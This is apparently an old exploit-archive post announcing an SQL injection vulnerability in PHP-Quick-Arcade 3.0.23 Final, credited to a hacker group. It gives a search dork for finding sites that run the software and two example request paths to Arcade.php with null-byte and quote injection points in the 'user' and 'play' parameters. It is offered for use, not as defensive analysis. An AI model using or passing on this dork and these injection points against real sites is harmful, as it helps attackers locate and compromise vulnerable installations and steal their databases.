PHP-Quick-Arcade 3.0.23 Final SQL Injection Vulnerability ----------------------------------------------------------- foun by :kurdish hackers team group : kurd-team contact : pshela@yahoo.com site : kurdteam.org ----------------------------------------------------------- ------------------------script----------------------------- ----------------------------------------------------------- script name:PHP-Quick-Arcade 3.0.23 Final download:http://quickarcade.jcink.com/ ----------------------------------------------------------- Exploit: -------- dork: "PHP-Quick-Arcade 3.0.23 Final" Exmple: ------- /Arcade.php?action=profile&user=Admin%00 [input SQL Injection] /Arcade.php?play=Invaders%00' [input SQL Injection] ----------------------------------------------------------- Zryan_kurd ,root-SyS -----------------------------------------------------------